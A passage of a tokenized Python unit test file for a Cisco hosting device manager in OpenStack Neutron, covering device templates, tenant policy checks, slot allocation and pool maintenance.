( ctx , <EOL> hd_id ) <EOL> self . assertIsNone ( res ) <EOL> agt_mock . assert_called_once_with ( <EOL> mock . ANY , [ hd_id ] , admin_state_up = True , <EOL> schedule = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_prepare . call_count ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_call . call_count ) <EOL> def test_hosting_device_policy ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> with self . port ( subnet = self . 
_mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> credentials_id = creds ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> self . _create_hosting_device ( <EOL> self . fmt , hdt_id , mgmt_port_id , True , <EOL> webob . exc . HTTPForbidden . code , <EOL> tenant_id = tenant_id , set_context = True ) <EOL> non_admin_ctx = n_context . Context ( '<STR_LIT>' , tenant_id ) <EOL> self . _show ( '<STR_LIT>' , hd_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> self . _update ( '<STR_LIT>' , hd_id , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } , <EOL> webob . exc . HTTPForbidden . code , non_admin_ctx ) <EOL> self . _delete ( '<STR_LIT>' , hd_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> req = self . new_show_request ( <EOL> '<STR_LIT>' , hd_id , self . fmt , <EOL> '<STR_LIT>' ) <EOL> req . environ [ '<STR_LIT>' ] = non_admin_ctx <EOL> res = req . get_response ( self . _api_for_resource ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( webob . exc . HTTPNotFound . code , <EOL> res . status_int ) <EOL> def test_create_vm_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_hw_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( <EOL> host_category = HW_CATEGORY ) <EOL> with self . hosting_device_template ( host_category = HW_CATEGORY ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . 
assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_nn_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( <EOL> host_category = NN_CATEGORY ) <EOL> with self . hosting_device_template ( host_category = NN_CATEGORY ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_show_hosting_device_template ( self ) : <EOL> name = "<STR_LIT>" <EOL> attrs = self . _get_test_hosting_device_template_attr ( name = name ) <EOL> with self . hosting_device_template ( name = name ) as hdt : <EOL> req = self . new_show_request ( '<STR_LIT>' , <EOL> hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> fmt = self . fmt ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_list_hosting_device_templates ( self ) : <EOL> with self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = VM_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt1 , self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = HW_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt2 , self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = NN_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt3 : <EOL> self . _test_list_resources ( <EOL> '<STR_LIT>' , [ hdt1 , hdt2 , hdt3 ] , <EOL> query_params = '<STR_LIT>' ) <EOL> def test_update_hosting_device_template ( self ) : <EOL> name = "<STR_LIT>" <EOL> attrs = self . _get_test_hosting_device_template_attr ( name = name ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : name } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , <EOL> hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . 
ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_delete_hosting_device_template_not_in_use_succeeds ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( no_delete = True ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> req = self . new_delete_request ( '<STR_LIT>' , hdt_id ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceTemplateNotFound , <EOL> self . _devmgr . get_hosting_device_template , ctx , hdt_id ) <EOL> def test_delete_hosting_device_template_in_use_fails ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) : <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceTemplateInUse , <EOL> self . _devmgr . delete_hosting_device_template , ctx , <EOL> hdt_id ) <EOL> req = self . new_show_request ( '<STR_LIT>' , <EOL> hdt_id , fmt = self . fmt ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT:200> , res . status_int ) <EOL> def test_hosting_device_template_policy ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . _create_hosting_device_template ( <EOL> self . fmt , '<STR_LIT>' , True , '<STR_LIT>' , <EOL> webob . exc . HTTPForbidden . code , <EOL> tenant_id = tenant_id , set_context = True ) <EOL> non_admin_ctx = n_context . 
Context ( '<STR_LIT>' , tenant_id ) <EOL> self . _show ( '<STR_LIT>' , hdt_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> self . _update ( '<STR_LIT>' , hdt_id , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False } } , <EOL> webob . exc . HTTPForbidden . code , non_admin_ctx ) <EOL> self . _delete ( '<STR_LIT>' , hdt_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> def _test_get_driver ( self , get_method , id = None , test_for_none = False , <EOL> is_admin = False ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = is_admin ) <EOL> driver_getter = getattr ( self . _devmgr , get_method ) <EOL> template_id = id or hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> driver = driver_getter ( context , template_id ) <EOL> if test_for_none : <EOL> self . assertIsNone ( driver ) <EOL> else : <EOL> self . assertIsNotNone ( driver ) <EOL> def test_get_hosting_device_driver ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' ) <EOL> def test_get_non_existent_hosting_device_driver_returns_none ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> def test_get_plugging_device_driver ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' ) <EOL> def test_get_non_existent_plugging_device_driver_returns_none ( self ) : <EOL> self . _test_get_driver ( '<STR_LIT>' , '<STR_LIT>' , <EOL> True ) <EOL> def test_get_device_info_for_agent ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt , self . port ( <EOL> subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> mgmt_ip = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> with self . 
hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = True ) <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( context , hd_id ) <EOL> info = self . _devmgr . get_device_info_for_agent ( context , hd_db ) <EOL> self . assertEqual ( mgmt_ip , info [ '<STR_LIT>' ] ) <EOL> def test_get_device_info_for_agent_no_mgmt_port ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> mgmt_ip = '<STR_LIT>' <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_ip_address = mgmt_ip , <EOL> management_port_id = None , <EOL> credentials_id = creds ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = True ) <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( context , hd_id ) <EOL> info = self . _devmgr . get_device_info_for_agent ( context , hd_db ) <EOL> self . assertEqual ( mgmt_ip , info [ '<STR_LIT>' ] ) <EOL> def _set_ownership ( self , bound_status , tenant_id , other_tenant_id = None ) : <EOL> if bound_status == UNBOUND : <EOL> return None <EOL> elif bound_status == OTHER : <EOL> return other_tenant_id or self . 
_other_tenant_id <EOL> else : <EOL> return tenant_id <EOL> def _test_slots ( self , expected_result = True , expected_bind = UNBOUND , <EOL> expected_allocation = VM_SLOT_CAPACITY , <EOL> num_requested = VM_SLOT_CAPACITY , <EOL> slot_capacity = VM_SLOT_CAPACITY , initial_bind = UNBOUND , <EOL> bind = False , auto_delete = True , is_admin = False , <EOL> pool_maintenance_expected = True , test_release = False , <EOL> expected_release_result = True , expected_final_allocation = <NUM_LIT:0> , <EOL> expected_release_bind = UNBOUND , <EOL> num_to_release = VM_SLOT_CAPACITY , <EOL> release_pool_maintenance_expected = True ) : <EOL> with self . hosting_device_template ( <EOL> slot_capacity = slot_capacity ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> resource = self . _get_fake_resource ( ) <EOL> tenant_bound = self . _set_ownership ( <EOL> initial_bind , resource [ '<STR_LIT>' ] ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> tenant_bound = tenant_bound , <EOL> auto_delete = auto_delete ) as hd : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = is_admin ) <EOL> hd_db = self . _devmgr . _get_hosting_device ( <EOL> context , hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> with mock . patch . object ( <EOL> hdm_db . HostingDeviceManagerMixin , <EOL> '<STR_LIT>' ) as pm_mock : <EOL> result = self . _devmgr . acquire_hosting_device_slots ( <EOL> context , hd_db , resource , '<STR_LIT>' , L3_ROUTER_NAT , <EOL> num_requested , bind ) <EOL> allocation = self . _devmgr . get_slot_allocation ( <EOL> context , resource_id = resource [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( expected_result , result ) <EOL> self . assertEqual ( expected_allocation , allocation ) <EOL> expected_bind = self . 
_set_ownership ( <EOL> expected_bind , resource [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_bind , hd_db . tenant_bound ) <EOL> if pool_maintenance_expected : <EOL> pm_mock . assert_called_once_with ( mock . ANY ) <EOL> num_calls = <NUM_LIT:1> <EOL> else : <EOL> pm_mock . assert_not_called ( ) <EOL> num_calls = <NUM_LIT:0> <EOL> if test_release : <EOL> result = self . _devmgr . release_hosting_device_slots ( <EOL> context , hd_db , resource , num_to_release ) <EOL> if not test_release : <EOL> return <EOL> allocation = self . _devmgr . get_slot_allocation ( <EOL> context , resource_id = resource [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( expected_release_result , result ) <EOL> self . assertEqual ( expected_final_allocation , <EOL> allocation ) <EOL> expected_release_bind = self . _set_ownership ( <EOL> expected_release_bind , resource [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_release_bind , <EOL> hd_db . tenant_bound ) <EOL> if release_pool_maintenance_expected : <EOL> num_calls += <NUM_LIT:1> <EOL> self . assertEqual ( num_calls , pm_mock . call_count ) <EOL> else : <EOL> num_to_release = <NUM_LIT:0> <EOL> to_clean_up = num_requested - num_to_release <EOL> if to_clean_up < <NUM_LIT:0> : <EOL> to_clean_up = num_requested <EOL> if to_clean_up : <EOL> self . _devmgr . release_hosting_device_slots ( <EOL> context , hd_db , resource , to_clean_up ) <EOL> def test_acquire_with_slot_surplus_in_owned_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True ) <EOL> def test_acquire_with_slot_surplus_in_shared_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( ) <EOL> def test_acquire_with_slot_surplus_take_hosting_device_ownership_succeeds ( <EOL> self ) : <EOL> self . 
_test_slots ( expected_bind = REQUESTER , initial_bind = UNBOUND , <EOL> bind = True ) <EOL> def test_acquire_with_slot_surplus_drop_hosting_device_ownership_succeeds ( <EOL> self ) : <EOL> self . _test_slots ( expected_bind = UNBOUND , initial_bind = REQUESTER , <EOL> bind = False ) <EOL> def test_acquire_slots_release_hosting_device_ownership_affects_all ( self ) : <EOL> pass <EOL> def test_acquire_slots_in_other_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False ) <EOL> def test_acquire_slots_take_ownership_of_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> bind = True , pool_maintenance_expected = False ) <EOL> def test_acquire_slots_take_ownership_of_multi_tenant_hosting_device_fails ( <EOL> self ) : <EOL> pass <EOL> def test_acquire_with_slot_deficit_in_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = REQUESTER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = REQUESTER , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_acquire_with_slot_deficit_in_shared_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = UNBOUND , <EOL> expected_allocation = <NUM_LIT:0> , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_acquire_with_slot_deficit_in_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . 
_test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> num_requested = VM_SLOT_CAPACITY + <NUM_LIT:1> , <EOL> pool_maintenance_expected = False ) <EOL> def test_release_allocated_slots_in_owned_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_bind = REQUESTER , <EOL> expected_final_allocation = <NUM_LIT:1> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> ) <EOL> def test_release_allocated_slots_in_shared_hosting_device_succeeds ( self ) : <EOL> self . _test_slots ( test_release = True , expected_final_allocation = <NUM_LIT:1> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> ) <EOL> def test_release_all_slots_returns_hosting_device_ownership ( self ) : <EOL> self . _test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_bind = UNBOUND ) <EOL> def test_release_slots_in_other_owned_hosting_device_fails ( self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False , <EOL> test_release = True , expected_release_result = False , <EOL> expected_release_bind = OTHER , <EOL> expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = VM_SLOT_CAPACITY - <NUM_LIT:1> , <EOL> release_pool_maintenance_expected = False ) <EOL> def test_release_too_many_slots_in_owned_hosting_device_fails ( self ) : <EOL> self . 
_test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , <EOL> expected_release_result = False , <EOL> expected_release_bind = REQUESTER , <EOL> expected_final_allocation = VM_SLOT_CAPACITY , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_release_too_many_slots_in_shared_hosting_device_fails ( self ) : <EOL> self . _test_slots ( test_release = True , expected_release_result = False , <EOL> expected_release_bind = UNBOUND , <EOL> expected_final_allocation = VM_SLOT_CAPACITY , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> ) <EOL> def test_release_too_many_slots_in_other_owned_hosting_device_fails ( <EOL> self ) : <EOL> self . _test_slots ( expected_result = False , expected_bind = OTHER , <EOL> expected_allocation = <NUM_LIT:0> , initial_bind = OTHER , <EOL> pool_maintenance_expected = False , <EOL> test_release = True , expected_release_result = False , <EOL> expected_release_bind = OTHER , <EOL> expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = VM_SLOT_CAPACITY + <NUM_LIT:1> , <EOL> release_pool_maintenance_expected = False ) <EOL> def test_release_all_slots_by_negative_num_argument_shared_hosting_device ( <EOL> self ) : <EOL> self . _test_slots ( test_release = True , expected_final_allocation = <NUM_LIT:0> , <EOL> num_to_release = - <NUM_LIT:1> ) <EOL> def test_release_all_slots_by_negative_num_argument_owned_hosting_device ( <EOL> self ) : <EOL> self . 
_test_slots ( expected_bind = REQUESTER , initial_bind = REQUESTER , <EOL> bind = True , test_release = True , expected_release_bind = UNBOUND , <EOL> expected_final_allocation = <NUM_LIT:0> , num_to_release = - <NUM_LIT:1> ) <EOL> def _test_delete ( self , to_delete = None , auto_delete = None , no_delete = None , <EOL> force_delete = True , expected_num_remaining = <NUM_LIT:0> ) : <EOL> auto_delete = auto_delete or [ True , False , False , True , True ] <EOL> no_delete = no_delete or [ True , True , True , True , True ] <EOL> with self . hosting_device_template ( ) as hdt1 , self . hosting_device_template ( ) as hdt2 : <EOL> hdt0_id = hdt1 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hdt1_id = hdt2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:0> ] ) as mgmt_port0 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:1> ] ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:2> ] ) as mgmt_port2 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:3> ] ) as mgmt_port3 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete [ <NUM_LIT:4> ] ) as mgmt_port4 : <EOL> mp0_id = mgmt_port0 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp1_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp2_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp3_id = mgmt_port3 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp4_id = mgmt_port4 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp0_id , auto_delete = auto_delete [ <NUM_LIT:0> ] , <EOL> no_delete = no_delete [ <NUM_LIT:0> ] ) , self . 
hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt1_id , <EOL> management_port_id = mp1_id , auto_delete = auto_delete [ <NUM_LIT:1> ] , <EOL> no_delete = no_delete [ <NUM_LIT:1> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp2_id , auto_delete = auto_delete [ <NUM_LIT:2> ] , <EOL> no_delete = no_delete [ <NUM_LIT:2> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt0_id , <EOL> management_port_id = mp3_id , <EOL> auto_delete = auto_delete [ <NUM_LIT:3> ] , <EOL> no_delete = no_delete [ <NUM_LIT:3> ] ) , self . hosting_device ( <EOL> device_id = '<STR_LIT>' , template_id = hdt1_id , <EOL> management_port_id = mp4_id , auto_delete = auto_delete [ <NUM_LIT:4> ] , <EOL> no_delete = no_delete [ <NUM_LIT:4> ] ) : <EOL> context = self . _get_test_context ( is_admin = True ) <EOL> if to_delete is None : <EOL> self . _devmgr . delete_all_hosting_devices ( <EOL> context , force_delete ) <EOL> elif to_delete == <NUM_LIT:0> : <EOL> template = ( <EOL> self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt0_id ) ) <EOL> ( self . _devmgr . <EOL> delete_all_hosting_devices_by_template ( <EOL> context , template , force_delete ) ) <EOL> else : <EOL> template = ( <EOL> self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt1_id ) ) <EOL> ( self . _devmgr . <EOL> delete_all_hosting_devices_by_template ( <EOL> context , template , force_delete ) ) <EOL> result_hds = self . _list ( <EOL> '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( expected_num_remaining , <EOL> len ( result_hds ) ) <EOL> def test_delete_all_hosting_devices ( self ) : <EOL> self . _test_delete ( ) <EOL> def test_delete_all_managed_hosting_devices ( self ) : <EOL> self . 
_test_delete ( no_delete = [ True , False , False , True , True ] , <EOL> force_delete = False , expected_num_remaining = <NUM_LIT:2> ) <EOL> def test_delete_all_hosting_devices_by_template ( self ) : <EOL> self . _test_delete ( to_delete = <NUM_LIT:1> , expected_num_remaining = <NUM_LIT:3> , <EOL> no_delete = [ False , True , False , False , True ] ) <EOL> def test_delete_all_managed_hosting_devices_by_template ( self ) : <EOL> self . _test_delete ( to_delete = <NUM_LIT:1> , expected_num_remaining = <NUM_LIT:4> , <EOL> no_delete = [ False , False , False , False , True ] , <EOL> force_delete = False ) <EOL> def _test_failed_hosting_device ( self , host_category = VM_CATEGORY , <EOL> expected_num_remaining = <NUM_LIT:0> , <EOL> auto_delete = True , no_delete = True ) : <EOL> with self . hosting_device_template ( host_category = host_category ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = no_delete ) as mgmt_port : <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = auto_delete , no_delete = no_delete ) as hd : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> m2 = mock . MagicMock ( ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : m2 } <EOL> context = self . _get_test_context ( ) <EOL> self . _devmgr . handle_non_responding_hosting_devices ( <EOL> context , None , [ hd_id ] ) <EOL> result_hds = self . _list ( '<STR_LIT>' ) [ <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( expected_num_remaining , <EOL> len ( result_hds ) ) <EOL> l3mock = ( NeutronManager . get_service_plugins ( ) . get ( ) . <EOL> handle_non_responding_hosting_devices ) <EOL> l3mock . assert_called_once_with ( mock . ANY , mock . 
ANY , <EOL> { hd_id : { } } ) <EOL> if expected_num_remaining == <NUM_LIT:0> : <EOL> m2 . hosting_devices_removed . assert_called_once_with ( <EOL> mock . ANY , { hd_id : { } } , False , None ) <EOL> def test_failed_managed_vm_based_hosting_device_gets_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( ) <EOL> def test_failed_non_managed_vm_based_hosting_device_not_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( expected_num_remaining = <NUM_LIT:1> , <EOL> auto_delete = False , no_delete = False ) <EOL> def test_failed_non_vm_based_hosting_device_not_deleted ( self ) : <EOL> self . _test_failed_hosting_device ( host_category = HW_CATEGORY , <EOL> expected_num_remaining = <NUM_LIT:1> , <EOL> no_delete = False ) <EOL> def _test_pool_maintenance ( self , desired_slots_free = <NUM_LIT:10> , slot_capacity = <NUM_LIT:3> , <EOL> host_category = VM_CATEGORY , expected = <NUM_LIT:15> , <EOL> define_credentials = True ) : <EOL> with self . hosting_device_template ( <EOL> host_category = host_category , slot_capacity = slot_capacity , <EOL> desired_slots_free = desired_slots_free , <EOL> plugging_driver = TEST_PLUGGING_DRIVER ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> creds_id = ( DEFAULT_CREDENTIALS_ID if define_credentials is True <EOL> else '<STR_LIT>' ) <EOL> credentials = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> with mock . patch . dict ( <EOL> self . plugin . _credentials , <EOL> { creds_id : credentials } ) , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = True ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet , <EOL> no_delete = True ) as mgmt_port2 : <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , no_delete = True ) , self . 
hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , no_delete = True ) : <EOL> context = self . _get_test_context ( is_admin = True ) <EOL> template = self . _devmgr . _get_hosting_device_template ( <EOL> context , hdt_id ) <EOL> self . _devmgr . _gt_pool = mock . MagicMock ( ) <EOL> self . _devmgr . _gt_pool . spawn_n . side_effect = ( <EOL> lambda fcn , ctx , tmplt : fcn ( ctx , tmplt ) ) <EOL> self . _devmgr . _dispatch_pool_maintenance_job ( <EOL> template ) <EOL> result_hds = self . _list ( <EOL> '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> self . assertEqual ( expected , len ( result_hds ) * slot_capacity ) <EOL> self . _devmgr . delete_all_hosting_devices ( context , True ) <EOL> def test_vm_based_hosting_device_excessive_slot_deficit_adds_slots ( self ) : <EOL> self . _test_pool_maintenance ( ) <EOL> def test_vm_based_hosting_device_excessive_slot_deficit_no_credentials ( <EOL> self ) : <EOL> self . _test_pool_maintenance ( expected = <NUM_LIT:6> , define_credentials = False ) <EOL> def test_vm_based_hosting_device_marginal_slot_deficit_no_change ( self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:7> , expected = <NUM_LIT:6> ) <EOL> def test_vm_based_hosting_device_excessive_slot_surplus_removes_slots ( <EOL> self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:3> , expected = <NUM_LIT:3> ) <EOL> def test_vm_based_hosting_device_marginal_slot_surplus_no_change ( self ) : <EOL> self . _test_pool_maintenance ( desired_slots_free = <NUM_LIT:5> , expected = <NUM_LIT:6> ) <EOL> def test_hw_based_hosting_device_no_change ( self ) : <EOL> self . _test_pool_maintenance ( host_category = HW_CATEGORY , expected = <NUM_LIT:6> ) </s>
